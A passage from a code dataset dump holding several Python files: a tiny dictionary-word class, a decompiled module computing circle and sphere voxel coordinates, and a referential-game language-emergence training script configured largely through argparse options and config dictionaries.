msg, t, specBW, LINK_EXISTS)\n # the message gets deleted from the current node, and buffer gets shrinked\n # isVisited is to get to the end of the node buffer even if it is not empty\n isVisited -= 1\n\n\n\n\n\n","sub_path":"X-CHANTS_UMass/network3.py","file_name":"network3.py","file_ext":"py","file_size_in_byte":4647,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"9148677","text":"\n\n#calss header\nclass _MAINLAND():\n\tdef __init__(self,): \n\t\tself.name = \"MAINLAND\"\n\t\tself.definitions = [u'the main part of a country or continent, not including the islands around it: ']\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'nouns'\n\n\n\tdef run(self, obj1 = [], obj2 = []):\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/nouns/_mainland.py","file_name":"_mainland.py","file_ext":"py","file_size_in_byte":362,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"337640372","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.7 (3394)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.linux-x86_64/egg/gentex/sphere.py\n# Compiled at: 2019-10-04 13:17:54\n# Size of source mod 2**32: 3837 bytes\n\n\ndef circle_in(xm, ym, r):\n circ = []\n x = -r\n y = 0\n err = 2 - 2 * r\n while x < 0:\n for i in range(-1, x - 1, -1):\n circ.append([xm - i, ym + y])\n circ.append([xm - y, ym - i])\n circ.append([xm + i, ym - y])\n circ.append([xm + y, ym + i])\n\n r = err\n if r > x:\n x += 1\n err += x * 2 + 1\n if r <= y:\n y += 1\n err += y * 2 + 1\n\n return circ\n\n\ndef bres_circle(xm, ym, r):\n circ = []\n x = -r\n y = 0\n err = 2 - 2 * r\n while x < 0:\n circ.append([xm - x, ym + y])\n circ.append([xm - y, ym - x])\n circ.append([xm + x, ym - y])\n circ.append([xm + y, ym + x])\n r = err\n if r > x:\n x += 1\n err += x * 2 + 1\n if r <= y:\n y += 1\n err += y * 2 + 1\n\n return circ\n\n\ndef rem_dup(mylist):\n if mylist:\n mylist.sort()\n last = mylist[(-1)]\n for i in range(len(mylist) - 2, -1, -1):\n if last == mylist[i]:\n del mylist[i]\n else:\n last = mylist[i]\n\n return mylist\n\n\ndef get_radii(r):\n zero_circle = bres_circle(0, 0, r)\n radii = []\n if r > 1:\n for step in range(r + 1):\n for zc in zero_circle:\n if zc[0] == step and zc[1] > 0:\n radii.append(zc[1])\n\n else:\n radii = [\n 1, 0]\n return radii\n\n\ndef sphere_shell(xm, ym, zm, r):\n shell = []\n radii = get_radii(r)\n for z in range(len(radii) - 1):\n circ = bres_circle(xm, ym, radii[z])\n for ci in circ:\n withzp = ci + [z + zm]\n shell.append(withzp)\n if z > 0:\n withzm = ci + [zm - z]\n shell.append(withzm)\n\n for x in range(-radii[r], radii[r] + 1):\n for y in range(-radii[r], radii[r] + 1):\n shell.append([x + xm, y + ym, r + zm])\n shell.append([x + xm, y + ym, zm - r])\n\n return shell\n\n\ndef sphere(xm, ym, zm, r):\n sphere = []\n r2 = r * r\n for x in range(r):\n for y in range(r):\n for z in range(r):\n if x > 0:\n x2 = x * x\n else:\n x2 = 0\n if y > 0:\n y2 = y * y\n else:\n y2 = 0\n if z > 0:\n z2 = z * z\n else:\n z2 = 0\n if x2 + y2 + z2 < r2:\n sphere.append([x + xm, y + ym, z + zm])\n if x > 0:\n sphere.append([-x + xm, y + ym, z + zm])\n if y > 0:\n sphere.append([x + xm, -y + ym, z + zm])\n if x > 0:\n sphere.append([-x + xm, -y + ym, z + zm])\n if z > 0:\n sphere.append([x + xm, y + ym, -z + zm])\n if x > 0:\n sphere.append([-x + xm, y + ym, -z + zm])\n if y > 0:\n sphere.append([x + xm, -y + ym, -z + zm])\n if x > 0:\n sphere.append([-x + xm, -y + ym, -z + zm])\n\n return sphere","sub_path":"pycfiles/gentex-0.1.2-py3.7-linux-x86_64/sphere.cpython-37.py","file_name":"sphere.cpython-37.py","file_ext":"py","file_size_in_byte":3579,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"121528004","text":"import sys\nimport random\nimport numpy as np \nimport argparse \nimport copy\n\nimport ReferentialGym\n\nimport torch\nimport torch.nn as nn \nimport torch.nn.functional as F \n\nimport torchvision\nimport torchvision.transforms as T \n\n\ndef main():\n parser = argparse.ArgumentParser(description=\"LSTM VAE Agents: ST-GS Language Emergence.\")\n parser.add_argument(\"--seed\", type=int, default=0)\n parser.add_argument(\"--parent_folder\", type=str, help=\"folder to save into.\",default=\"\")\n parser.add_argument(\"--symbolic\", action=\"store_true\", default=False)\n parser.add_argument(\"--use_cuda\", action=\"store_true\", default=False)\n parser.add_argument(\"--dataset\", type=str, \n choices=[\"Sort-of-CLEVR\",\n \"tiny-Sort-of-CLEVR\",\n \"XSort-of-CLEVR\",\n \"tiny-XSort-of-CLEVR\",\n \"dSprites\",\n ], \n help=\"dataset to train on.\",\n default=\"dSprites\")\n parser.add_argument(\"--arch\", type=str, \n choices=[\"CNN\",\n \"CNN3x3\",\n \"BN+CNN\",\n \"BN+CNN3x3\",\n \"BN+BetaVAE3x3\",\n \"BN+Coord2CNN3x3\",\n \"BN+Coord4CNN3x3\",\n ], \n help=\"model architecture to train\",\n default=\"BN+BetaVAE3x3\")\n parser.add_argument(\"--graphtype\", type=str,\n choices=[\"straight_through_gumbel_softmax\",\n \"reinforce\",\n \"baseline_reduced_reinforce\",\n \"normalized_reinforce\",\n \"baseline_reduced_normalized_reinforce\",\n \"max_entr_reinforce\",\n \"baseline_reduced_normalized_max_entr_reinforce\",\n \"argmax_reinforce\",\n \"obverter\"],\n help=\"type of graph to use during training of the speaker and listener.\",\n default=\"straight_through_gumbel_softmax\")\n parser.add_argument(\"--max_sentence_length\", type=int, default=20)\n parser.add_argument(\"--vocab_size\", type=int, default=100)\n parser.add_argument(\"--optimizer_type\", type=str, \n choices=[\n \"adam\",\n \"sgd\"\n ],\n default=\"adam\")\n parser.add_argument(\"--agent_loss_type\", type=str,\n choices=[\n \"Hinge\",\n \"NLL\",\n \"CE\",\n \"BCE\",\n ],\n default=\"Hinge\")\n parser.add_argument(\"--agent_type\", type=str,\n choices=[\n \"Baseline\",\n ],\n default=\"Baseline\")\n parser.add_argument(\"--rnn_type\", type=str,\n choices=[\n \"LSTM\",\n \"GRU\",\n ],\n default=\"LSTM\")\n parser.add_argument(\"--lr\", type=float, default=1e-4)\n parser.add_argument(\"--epoch\", type=int, default=1875)\n parser.add_argument(\"--metric_epoch_period\", type=int, default=20)\n parser.add_argument(\"--dataloader_num_worker\", type=int, default=4)\n parser.add_argument(\"--metric_fast\", action=\"store_true\", default=False)\n parser.add_argument(\"--batch_size\", type=int, default=8)\n parser.add_argument(\"--mini_batch_size\", type=int, default=128)\n parser.add_argument(\"--dropout_prob\", type=float, default=0.0)\n parser.add_argument(\"--emb_dropout_prob\", type=float, default=0.8)\n parser.add_argument(\"--nbr_experience_repetition\", type=int, default=1)\n parser.add_argument(\"--nbr_train_dataset_repetition\", type=int, default=1)\n parser.add_argument(\"--nbr_test_dataset_repetition\", type=int, default=1)\n parser.add_argument(\"--nbr_test_distractors\", type=int, default=63)\n parser.add_argument(\"--nbr_train_distractors\", type=int, default=47)\n parser.add_argument(\"--resizeDim\", default=32, type=int,help=\"input image resize\")\n #TODO: make sure it is understood....!\n parser.add_argument(\"--shared_architecture\", action=\"store_true\", default=True)\n parser.add_argument(\"--with_baseline\", action=\"store_true\", default=False)\n parser.add_argument(\"--homoscedastic_multitasks_loss\", action=\"store_true\", default=False)\n parser.add_argument(\"--use_curriculum_nbr_distractors\", action=\"store_true\", default=False)\n parser.add_argument(\"--use_feat_converter\", action=\"store_true\", default=False)\n parser.add_argument(\"--descriptive\", action=\"store_true\", default=False)\n parser.add_argument(\"--descriptive_ratio\", type=float, default=0.0)\n parser.add_argument(\"--egocentric\", action=\"store_true\", default=False)\n parser.add_argument(\"--distractor_sampling\", type=str,\n choices=[ \"uniform\",\n \"similarity-0.98\",\n \"similarity-0.90\",\n \"similarity-0.75\",\n ],\n default=\"uniform\")\n # Obverter Hyperparameters:\n parser.add_argument(\"--use_sentences_one_hot_vectors\", action=\"store_true\", default=False)\n parser.add_argument(\"--differentiable\", action=\"store_true\", default=False)\n parser.add_argument(\"--obverter_threshold_to_stop_message_generation\", type=float, default=0.95)\n parser.add_argument(\"--obverter_nbr_games_per_round\", type=int, default=4)\n # Cultural Bottleneck:\n parser.add_argument(\"--iterated_learning_scheme\", action=\"store_true\", default=False)\n parser.add_argument(\"--iterated_learning_period\", type=int, default=4)\n parser.add_argument(\"--iterated_learning_rehearse_MDL\", action=\"store_true\", default=False)\n parser.add_argument(\"--iterated_learning_rehearse_MDL_factor\", type=float, default=1.0)\n \n # Dataset Hyperparameters:\n parser.add_argument(\"--train_test_split_strategy\", type=str, \n choices=[\"combinatorial2-Y-2-8-X-2-8-Orientation-40-N-Scale-6-N-Shape-3-N\", # Exp : DoRGsFurtherDise interweaved split simple XY normal \n \"combinatorial2-Y-2-S8-X-2-S8-Orientation-40-N-Scale-4-N-Shape-1-N\",\n \"combinatorial2-Y-32-N-X-32-N-Orientation-5-S4-Scale-1-S3-Shape-3-N\", #Sparse 2 Attributes: Orient.+Scale 64 imgs, 48 train, 16 test\n \"combinatorial2-Y-2-S8-X-2-S8-Orientation-40-N-Scale-6-N-Shape-3-N\", # 4x Denser 2 Attributes: 256 imgs, 192 train, 64 test,\n \n # Heart shape: interpolation:\n \"combinatorial2-Y-4-2-X-4-2-Orientation-40-N-Scale-6-N-Shape-3-N\", #Sparse 2 Attributes: X+Y 64 imgs, 48 train, 16 test\n \"combinatorial2-Y-2-2-X-2-2-Orientation-40-N-Scale-6-N-Shape-3-N\", #Dense 2 Attributes: X+Y 256 imgs, 192 train, 64 test\n \"combinatorial2-Y-8-2-X-8-2-Orientation-10-2-Scale-1-2-Shape-3-N\", #COMB2:Sparser 4 Attributes: 264 test / 120 train\n \"combinatorial2-Y-4-2-X-4-2-Orientation-5-2-Scale-1-2-Shape-3-N\", #COMB2:Sparse 4 Attributes: 2112 test / 960 train\n \"combinatorial2-Y-2-2-X-2-2-Orientation-2-2-Scale-1-2-Shape-3-N\", #COMB2:Dense 4 Attributes: ? test / ? train\n \"combinatorial2-Y-4-2-X-4-2-Orientation-5-2-Scale-6-N-Shape-3-N\", #COMB2 Sparse: 3 Attributes: XYOrientation 256 test / 256 train\n # Heart shape: Extrapolation:\n \"combinatorial2-Y-4-S4-X-4-S4-Orientation-40-N-Scale-6-N-Shape-3-N\", #Sparse 2 Attributes: X+Y 64 imgs, 48 train, 16 test\n \"combinatorial2-Y-8-S2-X-8-S2-Orientation-10-S2-Scale-1-S3-Shape-3-N\", #COMB2:Sparser 4 Attributes: 264 test / 120 train\n \"combinatorial2-Y-4-S4-X-4-S4-Orientation-5-S4-Scale-1-S3-Shape-3-N\", #COMB2:Sparse 4 Attributes: 2112 test / 960 train\n \"combinatorial2-Y-2-S8-X-2-S8-Orientation-2-S10-Scale-1-S3-Shape-3-N\", #COMB2:Dense 4 Attributes: ? test / ? train\n \"combinatorial2-Y-4-S4-X-4-S4-Orientation-5-S4-Scale-6-N-Shape-3-N\", #COMB2 Sparse: 3 Attributes: XYOrientation 256 test / 256 train\n\n # Ovale shape:\n \"combinatorial2-Y-1-S16-X-1-S16-Orientation-40-N-Scale-6-N-Shape-2-N\", # Denser 2 Attributes X+Y X 16/ Y 16/ --> 256 test / 768 train \n \"combinatorial2-Y-8-S2-X-8-S2-Orientation-10-S2-Scale-1-S3-Shape-2-N\", #COMB2:Sparser 4 Attributes: 264 test / 120 train\n \"combinatorial2-Y-4-S4-X-4-S4-Orientation-5-S4-Scale-1-S3-Shape-2-N\", #COMB2:Sparse 4 Attributes: 2112 test / 960 train\n \"combinatorial2-Y-2-S8-X-2-S8-Orientation-2-S10-Scale-1-S3-Shape-2-N\", #COMB2:Dense 4 Attributes: ? test / ? train\n \n #3 Attributes: denser 2 attributes(X+Y) with the sample size of Dense 4 attributes:\n \"combinatorial2-Y-1-S16-X-1-S16-Orientation-2-S10-Scale-6-N-Shape-2-N\", \n \n \"combinatorial4-Y-4-S4-X-4-S4-Orientation-5-S4-Scale-1-S3-Shape-3-N\", #Sparse 4 Attributes: 192 test / 1344 train\n ],\n help=\"train/test split strategy\",\n # INTER:\n #default=\"combinatorial2-Y-4-2-X-4-2-Orientation-40-N-Scale-6-N-Shape-3-N\")\n # EXTRA:\n #default=\"combinatorial2-Y-4-S4-X-4-S4-Orientation-40-N-Scale-6-N-Shape-3-N\")\n # EXTRA-3:\n default=\"combinatorial2-Y-4-S4-X-4-S4-Orientation-5-S4-Scale-6-N-Shape-3-N\")\n parser.add_argument(\"--fast\", action=\"store_true\", default=False, \n help=\"Disable the deterministic CuDNN. It is likely to make the computation faster.\")\n \n #--------------------------------------------------------------------------\n #--------------------------------------------------------------------------\n # VAE Hyperparameters:\n #--------------------------------------------------------------------------\n #--------------------------------------------------------------------------\n parser.add_argument(\"--vae_detached_featout\", action=\"store_true\", default=False)\n\n parser.add_argument(\"--vae_lambda\", type=float, default=1.0)\n parser.add_argument(\"--vae_use_mu_value\", action=\"store_true\", default=False)\n \n parser.add_argument(\"--vae_nbr_latent_dim\", type=int, default=32)\n parser.add_argument(\"--vae_decoder_nbr_layer\", type=int, default=3)\n parser.add_argument(\"--vae_decoder_conv_dim\", type=int, default=32)\n \n parser.add_argument(\"--vae_gaussian\", action=\"store_true\", default=False)\n parser.add_argument(\"--vae_gaussian_sigma\", type=float, default=0.25)\n \n parser.add_argument(\"--vae_beta\", type=float, default=1.0)\n parser.add_argument(\"--vae_factor_gamma\", type=float, default=0.0)\n \n parser.add_argument(\"--vae_constrained_encoding\", action=\"store_true\", default=False)\n parser.add_argument(\"--vae_max_capacity\", type=float, default=1e3)\n parser.add_argument(\"--vae_nbr_epoch_till_max_capacity\", type=int, default=10)\n\n #--------------------------------------------------------------------------\n #--------------------------------------------------------------------------\n #--------------------------------------------------------------------------\n #--------------------------------------------------------------------------\n \n \n args = parser.parse_args()\n print(args)\n\n gaussian = args.vae_gaussian \n vae_observation_sigma = args.vae_gaussian_sigma\n \n vae_beta = args.vae_beta \n factor_vae_gamma = args.vae_factor_gamma\n \n vae_constrainedEncoding = args.vae_constrained_encoding\n maxCap = args.vae_max_capacity #1e2\n nbrepochtillmaxcap = args.vae_nbr_epoch_till_max_capacity\n\n monet_gamma = 5e-1\n \n #--------------------------------------------------------------------------\n #--------------------------------------------------------------------------\n #--------------------------------------------------------------------------\n #--------------------------------------------------------------------------\n \n seed = args.seed \n\n # Following: https://pytorch.org/docs/stable/notes/randomness.html\n torch.manual_seed(seed)\n if hasattr(torch.backends, \"cudnn\") and not(args.fast):\n torch.backends.cudnn.deterministic = True\n torch.backends.cudnn.benchmark = False\n\n np.random.seed(seed)\n random.seed(seed)\n # # Hyperparameters:\n\n nbr_epoch = args.epoch\n \n cnn_feature_size = -1 #600 #128 #256 #\n # Except for VAEs...!\n \n stimulus_resize_dim = args.resizeDim #64 #28\n \n normalize_rgb_values = False \n \n rgb_scaler = 1.0 #255.0\n from ReferentialGym.datasets.utils import ResizeNormalize\n transform = ResizeNormalize(size=stimulus_resize_dim, \n normalize_rgb_values=normalize_rgb_values,\n rgb_scaler=rgb_scaler)\n\n from ReferentialGym.datasets.utils import AddEgocentricInvariance\n ego_inv_transform = AddEgocentricInvariance()\n\n transform_degrees = 25\n transform_translate = (0.0625, 0.0625)\n\n default_descriptive_ratio = 1-(1/(args.nbr_train_distractors+2))\n # Default: 1-(1/(nbr_distractors+2)), \n # otherwise the agent find the local minimum\n # where it only predicts \"no-target\"...\n if args.descriptive_ratio <=0.001:\n descriptive_ratio = default_descriptive_ratio\n else:\n descriptive_ratio = args.descriptive_ratio\n\n rg_config = {\n \"observability\": \"partial\",\n \"max_sentence_length\": args.max_sentence_length,\n \"nbr_communication_round\": 1,\n \"nbr_distractors\": {\"train\":args.nbr_train_distractors, \"test\":args.nbr_test_distractors},\n \"distractor_sampling\": args.distractor_sampling,\n # Default: use \"similarity-0.5\"\n # otherwise the emerging language \n # will have very high ambiguity...\n # Speakers find the strategy of uttering\n # a word that is relevant to the class/label\n # of the target, seemingly. \n \n \"descriptive\": args.descriptive,\n \"descriptive_target_ratio\": descriptive_ratio,\n\n \"object_centric\": False,\n \"nbr_stimulus\": 1,\n\n \"graphtype\": args.graphtype,\n \"tau0\": 0.2,\n \"gumbel_softmax_eps\": 1e-6,\n \"vocab_size\": args.vocab_size,\n \"symbol_embedding_size\": 256, #64\n\n \"agent_architecture\": args.arch, #\"CoordResNet18AvgPooled-2\", #\"BetaVAE\", #\"ParallelMONet\", #\"BetaVAE\", #\"CNN[-MHDPA]\"/\"[pretrained-]ResNet18[-MHDPA]-2\"\n \"agent_learning\": \"learning\", #\"transfer_learning\" : CNN\"s outputs are detached from the graph...\n \"agent_loss_type\": args.agent_loss_type, #\"NLL\"\n\n \"cultural_pressure_it_period\": None,\n \"cultural_speaker_substrate_size\": 1,\n \"cultural_listener_substrate_size\": 1,\n \"cultural_reset_strategy\": \"oldestL\", # \"uniformSL\" #\"meta-oldestL-SGD\"\n \"cultural_reset_meta_learning_rate\": 1e-3,\n\n # Obverter\"s Cultural Bottleneck:\n \"iterated_learning_scheme\": args.iterated_learning_scheme,\n \"iterated_learning_period\": args.iterated_learning_period,\n \"iterated_learning_rehearse_MDL\": args.iterated_learning_rehearse_MDL,\n \"iterated_learning_rehearse_MDL_factor\": args.iterated_learning_rehearse_MDL_factor,\n \n \"obverter_stop_threshold\": args.obverter_threshold_to_stop_message_generation, #0.0 if not in use.\n \"obverter_nbr_games_per_round\": args.obverter_nbr_games_per_round,\n\n \"obverter_least_effort_loss\": False,\n \"obverter_least_effort_loss_weights\": [1.0 for x in range(0, 10)],\n\n \"batch_size\": args.batch_size,\n \"dataloader_num_worker\": args.dataloader_num_worker,\n \"stimulus_depth_dim\": 1 if \"dSprites\" in args.dataset else 3,\n \"stimulus_resize_dim\": stimulus_resize_dim, \n \n \"learning_rate\": args.lr, #1e-3,\n \"adam_eps\": 1e-8,\n \"dropout_prob\": args.dropout_prob,\n \"embedding_dropout_prob\": args.emb_dropout_prob,\n \n \"with_gradient_clip\": False,\n \"gradient_clip\": 1e0,\n \n \"use_homoscedastic_multitasks_loss\": args.homoscedastic_multitasks_loss,\n\n \"use_feat_converter\": args.use_feat_converter,\n\n \"use_curriculum_nbr_distractors\": args.use_curriculum_nbr_distractors,\n \"curriculum_distractors_window_size\": 25, #100,\n\n \"unsupervised_segmentation_factor\": None, #1e5\n \"nbr_experience_repetition\": args.nbr_experience_repetition,\n \n \"with_utterance_penalization\": False,\n \"with_utterance_promotion\": False,\n \"utterance_oov_prob\": 0.5, # Expected penalty of observing out-of-vocabulary words. \n # The greater this value, the greater the loss/cost.\n \"utterance_factor\": 1e-2,\n\n \"with_speaker_entropy_regularization\": False,\n \"with_listener_entropy_regularization\": False,\n \"entropy_regularization_factor\": -1e-2,\n\n \"with_mdl_principle\": False,\n \"mdl_principle_factor\": 5e-2,\n\n \"with_weight_maxl1_loss\": False,\n\n \"use_cuda\": args.use_cuda,\n \n \"train_transform\": transform,\n \"test_transform\": transform,\n }\n\n if args.egocentric:\n rg_config[\"train_transform\"]= T.Compose(\n [\n ego_inv_transform,\n T.RandomAffine(degrees=transform_degrees, \n translate=transform_translate, \n scale=None, \n shear=None, \n resample=False, \n fillcolor=0),\n transform\n ]\n )\n rg_config[\"test_transform\"]= T.Compose(\n [\n ego_inv_transform,\n T.RandomAffine(degrees=transform_degrees, \n translate=transform_translate, \n scale=None, \n shear=None, \n resample=False, \n fillcolor=0),\n transform\n ]\n )\n \n ## Train set:\n train_split_strategy = args.train_test_split_strategy\n test_split_strategy = train_split_strategy\n \n ## Agent Configuration:\n agent_config = copy.deepcopy(rg_config)\n agent_config[\"use_cuda\"] = rg_config[\"use_cuda\"]\n agent_config[\"homoscedastic_multitasks_loss\"] = rg_config[\"use_homoscedastic_multitasks_loss\"]\n agent_config[\"use_feat_converter\"] = rg_config[\"use_feat_converter\"]\n agent_config[\"max_sentence_length\"] = rg_config[\"max_sentence_length\"]\n agent_config[\"nbr_distractors\"] = rg_config[\"nbr_distractors\"][\"train\"] if rg_config[\"observability\"] == \"full\" else 0\n agent_config[\"nbr_stimulus\"] = rg_config[\"nbr_stimulus\"]\n agent_config[\"nbr_communication_round\"] = rg_config[\"nbr_communication_round\"]\n agent_config[\"descriptive\"] = rg_config[\"descriptive\"]\n agent_config[\"gumbel_softmax_eps\"] = rg_config[\"gumbel_softmax_eps\"]\n agent_config[\"agent_learning\"] = rg_config[\"agent_learning\"]\n\n # Obverter:\n agent_config[\"use_obverter_threshold_to_stop_message_generation\"] = args.obverter_threshold_to_stop_message_generation\n \n agent_config[\"symbol_embedding_size\"] = rg_config[\"symbol_embedding_size\"]\n\n # Recurrent Convolutional Architecture:\n agent_config[\"architecture\"] = rg_config[\"agent_architecture\"]\n agent_config[\"decoder_architecture\"] = \"DCNN\"\n if args.symbolic:\n agent_config[\"decoder_architecture\"] = \"BN+MLP\"\n \n agent_config[\"dropout_prob\"] = rg_config[\"dropout_prob\"]\n agent_config[\"embedding_dropout_prob\"] = rg_config[\"embedding_dropout_prob\"]\n \n if \"BetaVAE\" in agent_config[\"architecture\"]:\n agent_config['VAE_lambda'] = args.vae_lambda\n agent_config['vae_beta'] = args.vae_beta\n agent_config['factor_vae_gamma'] = args.vae_factor_gamma\n agent_config['vae_constrainedEncoding'] = args.vae_constrained_encoding\n agent_config['vae_use_gaussian_observation_model'] = args.vae_gaussian \n agent_config['vae_observation_sigma'] = args.vae_gaussian_sigma\n agent_config['vae_max_capacity'] = args.vae_max_capacity #1e2\n agent_config['vae_nbr_epoch_till_max_capacity'] = args.vae_nbr_epoch_till_max_capacity\n\n agent_config['vae_decoder_conv_dim'] = args.vae_decoder_conv_dim\n agent_config['vae_decoder_nbr_layer'] = args.vae_decoder_nbr_layer\n agent_config['vae_nbr_latent_dim'] = args.vae_nbr_latent_dim\n agent_config['vae_detached_featout'] = args.vae_detached_featout\n agent_config['vae_use_mu_value'] = args.vae_use_mu_value\n\n rg_config[\"use_feat_converter\"] = False\n agent_config[\"use_feat_converter\"] = False\n \n if \"BN\" in args.arch:\n agent_config[\"cnn_encoder_channels\"] = [\"BN32\",\"BN32\",\"BN64\",\"BN64\"]\n else:\n agent_config[\"cnn_encoder_channels\"] = [32,32,64,64]\n \n if \"3x3\" in agent_config[\"architecture\"]:\n agent_config[\"cnn_encoder_kernels\"] = [3,3,3,3]\n elif \"7x4x4x3\" in agent_config[\"architecture\"]:\n agent_config[\"cnn_encoder_kernels\"] = [7,4,4,3]\n else:\n agent_config[\"cnn_encoder_kernels\"] = [4,4,4,4]\n agent_config[\"cnn_encoder_strides\"] = [2,2,2,2]\n agent_config[\"cnn_encoder_paddings\"] = [1,1,1,1]\n agent_config[\"cnn_encoder_fc_hidden_units\"] = []#[128,] \n # the last FC layer is provided by the cnn_encoder_feature_dim parameter below...\n \n # For a fair comparison between CNN an VAEs:\n agent_config[\"cnn_encoder_feature_dim\"] = args.vae_nbr_latent_dim\n #agent_config[\"cnn_encoder_feature_dim\"] = cnn_feature_size\n # N.B.: if cnn_encoder_fc_hidden_units is [],\n # then this last parameter does not matter.\n # The cnn encoder is not topped by a FC network.\n\n agent_config[\"cnn_encoder_mini_batch_size\"] = args.mini_batch_size\n #agent_config[\"feat_converter_output_size\"] = cnn_feature_size\n agent_config[\"feat_converter_output_size\"] = 256\n\n if \"MHDPA\" in agent_config[\"architecture\"]:\n agent_config[\"mhdpa_nbr_head\"] = 4\n agent_config[\"mhdpa_nbr_rec_update\"] = 1\n agent_config[\"mhdpa_nbr_mlp_unit\"] = 256\n agent_config[\"mhdpa_interaction_dim\"] = 128\n\n agent_config[\"temporal_encoder_nbr_hidden_units\"] = 0\n agent_config[\"temporal_encoder_nbr_rnn_layers\"] = 0\n agent_config[\"temporal_encoder_mini_batch_size\"] = args.mini_batch_size\n agent_config[\"symbol_processing_nbr_hidden_units\"] = agent_config[\"temporal_encoder_nbr_hidden_units\"]\n agent_config[\"symbol_processing_nbr_rnn_layers\"] = 1\n\n ## Decoder:\n ### CNN:\n if \"BN\" in agent_config[\"decoder_architecture\"]:\n agent_config[\"cnn_decoder_channels\"] = [\"BN64\",\"BN64\",\"BN32\",\"BN32\"]\n else:\n agent_config[\"cnn_decoder_channels\"] = [64,64,32,32]\n \n if \"3x3\" in agent_config[\"decoder_architecture\"]:\n agent_config[\"cnn_decoder_kernels\"] = [3,3,3,3]\n elif \"3x4x4x7\" in agent_config[\"decoder_architecture\"]:\n agent_config[\"cnn_decoder_kernels\"] = [3,4,4,7]\n else:\n agent_config[\"cnn_decoder_kernels\"] = [4,4,4,4]\n agent_config[\"cnn_decoder_strides\"] = [2,2,2,2]\n agent_config[\"cnn_decoder_paddings\"] = [1,1,1,1]\n \n ### MLP:\n if \"BN\" in agent_config[\"decoder_architecture\"]:\n agent_config['mlp_decoder_fc_hidden_units'] = [\"BN256\", \"BN256\"]\n else:\n agent_config['mlp_decoder_fc_hidden_units'] = [256, 256]\n agent_config['mlp_decoder_fc_hidden_units'].append(40*6)\n \n else:\n raise NotImplementedError\n\n\n save_path = \"./\"\n if args.parent_folder != '':\n save_path += args.parent_folder+'/'\n save_path += f\"{args.dataset}+DualLabeled/\"\n if args.symbolic:\n save_path += f\"Symbolic/\"\n save_path += f\"{nbr_epoch}Ep_Emb{rg_config['symbol_embedding_size']}_CNN{cnn_feature_size}to{args.vae_nbr_latent_dim}\"\n if args.shared_architecture:\n save_path += \"/shared_architecture\"\n save_path += f\"Dropout{rg_config['dropout_prob']}_DPEmb{rg_config['embedding_dropout_prob']}\"\n save_path += f\"_BN_{rg_config['agent_learning']}/\"\n save_path += f\"{rg_config['agent_loss_type']}\"\n \n if 'dSprites' in args.dataset: \n train_test_strategy = f\"-{test_split_strategy}\"\n if test_split_strategy != train_split_strategy:\n train_test_strategy = f\"/train_{train_split_strategy}/test_{test_split_strategy}\"\n save_path += f\"/dSprites{train_test_strategy}\"\n \n save_path += f\"/OBS{rg_config['stimulus_resize_dim']}X{rg_config['stimulus_depth_dim']}C-Rep{rg_config['nbr_experience_repetition']}\"\n \n if rg_config['use_curriculum_nbr_distractors']:\n save_path += f\"+W{rg_config['curriculum_distractors_window_size']}Curr\"\n if rg_config['with_utterance_penalization']:\n save_path += \"+Tau-10-OOV{}PenProb{}\".format(rg_config['utterance_factor'], rg_config['utterance_oov_prob']) \n if rg_config['with_utterance_promotion']:\n save_path += \"+Tau-10-OOV{}ProProb{}\".format(rg_config['utterance_factor'], rg_config['utterance_oov_prob']) \n \n if rg_config['with_gradient_clip']:\n save_path += '+ClipGrad{}'.format(rg_config['gradient_clip'])\n \n if rg_config['with_speaker_entropy_regularization']:\n save_path += 'SPEntrReg{}'.format(rg_config['entropy_regularization_factor'])\n if rg_config['with_listener_entropy_regularization']:\n save_path += 'LSEntrReg{}'.format(rg_config['entropy_regularization_factor'])\n \n if rg_config['iterated_learning_scheme']:\n save_path += f\"-ILM{rg_config['iterated_learning_period']}{'+RehearseMDL{}'.format(rg_config['iterated_learning_rehearse_MDL_factor']) if rg_config['iterated_learning_rehearse_MDL'] else ''}\"\n \n if rg_config['with_mdl_principle']:\n save_path += '-MDL{}'.format(rg_config['mdl_principle_factor'])\n \n if rg_config['cultural_pressure_it_period'] != 'None': \n save_path += '-S{}L{}-{}-Reset{}'.\\\n format(rg_config['cultural_speaker_substrate_size'], \n rg_config['cultural_listener_substrate_size'],\n rg_config['cultural_pressure_it_period'],\n rg_config['cultural_reset_strategy']+str(rg_config['cultural_reset_meta_learning_rate']) if 'meta' in rg_config['cultural_reset_strategy'] else rg_config['cultural_reset_strategy'])\n \n save_path += '-{}{}CulturalAgent-SEED{}-{}-obs_b{}_minib{}_lr{}-{}-tau0-{}-{}DistrTrain{}Test{}-stim{}-vocab{}over{}_{}{}'.\\\n format(\n 'ObjectCentric' if rg_config['object_centric'] else '',\n 'Descriptive{}'.format(rg_config['descriptive_target_ratio']) if rg_config['descriptive'] else '',\n seed,\n rg_config['observability'], \n rg_config['batch_size'], \n args.mini_batch_size,\n rg_config['learning_rate'],\n rg_config['graphtype'], \n rg_config['tau0'], \n rg_config['distractor_sampling'],\n *rg_config['nbr_distractors'].values(), \n rg_config['nbr_stimulus'], \n rg_config['vocab_size'], \n rg_config['max_sentence_length'], \n rg_config['agent_architecture'],\n f\"/{'Detached' if args.vae_detached_featout else ''}beta{vae_beta}-factor{factor_vae_gamma}\" if 'BetaVAE' in rg_config['agent_architecture'] else ''\n )\n\n if 'MONet' in rg_config['agent_architecture'] or 'BetaVAE' in rg_config['agent_architecture']:\n save_path += f\"beta{vae_beta}-factor{factor_vae_gamma}-gamma{monet_gamma}-sigma{vae_observation_sigma}\" if 'MONet' in rg_config['agent_architecture'] else ''\n save_path += f\"CEMC{maxCap}over{nbrepochtillmaxcap}\" if vae_constrainedEncoding else ''\n save_path += f\"UnsupSeg{rg_config['unsupervised_segmentation_factor']}\" if rg_config['unsupervised_segmentation_factor'] is not None else ''\n save_path += f\"LossVAECoeff{args.vae_lambda}_{'UseMu' if args.vae_use_mu_value else ''}\"\n\n if rg_config['use_feat_converter']:\n save_path += f\"+FEATCONV\"\n \n if rg_config['use_homoscedastic_multitasks_loss']:\n save_path += '+Homo'\n \n save_path += 